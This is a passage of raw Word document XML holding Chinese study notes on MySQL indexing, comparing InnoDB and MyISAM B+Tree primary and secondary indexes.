        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC6E06" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC6E06" w:rsidP="00DC6E06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005E3B2B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分类：</w:t>
      </w:r>
      <w:r w:rsidR="005E3B2B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">B-Tree </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>索引，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>索引，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fulltext </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>索引和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> R-Tree </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>索引</w:t>
      </w:r>
      <w:r w:rsidR="005E3B2B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(GIS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC6E06" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC6E06" w:rsidP="00DC6E06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Innodb </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>存储引擎的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> B-Tree </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>索引实际使用的存储结构实际上是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> B+Tree</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC6E06" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC6E06" w:rsidP="00DC6E06">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3333FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3333FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3333FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3333FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC6E06" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC6E06" w:rsidP="00DC6E06">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一是主索引的区别，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的数据文件本身就是索引文件。而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的索引和数据是分开的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC6E06" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC6E06" w:rsidP="00DC6E06">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>二是辅助索引的区别：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的辅助索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>域存储相应记录主键的值而不是地址。而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的辅助索引和主索引没有多大区别。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D7425" w:rsidRPr="00F41A4C" w:rsidRDefault="004D7425" w:rsidP="00895BB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A489C" w:rsidRPr="00F41A4C" w:rsidRDefault="008A489C" w:rsidP="008A489C">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.1.1.1  MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00497CF0" w:rsidRPr="00F41A4C" w:rsidRDefault="00497CF0" w:rsidP="00497CF0">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>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MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>引擎使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>作为索引结构，叶节点的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>域存放的是数据记录的地址。下图是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>索引的原理图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00497CF0" w:rsidRPr="00F41A4C" w:rsidRDefault="00497CF0" w:rsidP="009F5D8B">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5836258" cy="5087549"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="图片 1" descr="http://up.2cto.com/2012/1130/201211301112574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up.2cto.com/2012/1130/20121130111257402.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId217" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5834882" cy="5086350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00497CF0" w:rsidRPr="00F41A4C" w:rsidRDefault="00497CF0" w:rsidP="00497CF0">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>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这里设表一共有三列，假设我们以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Col1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为主键，则上图是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表的主索引（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Primary key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）示意。可以看出</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的索引文件仅仅保存数据记录的地址。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中，主索引和辅助索引（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Secondary key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）在结构上没有任何区别，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>只是主索引要求</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是唯一的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，而辅助索引的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以重复。如果我们在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
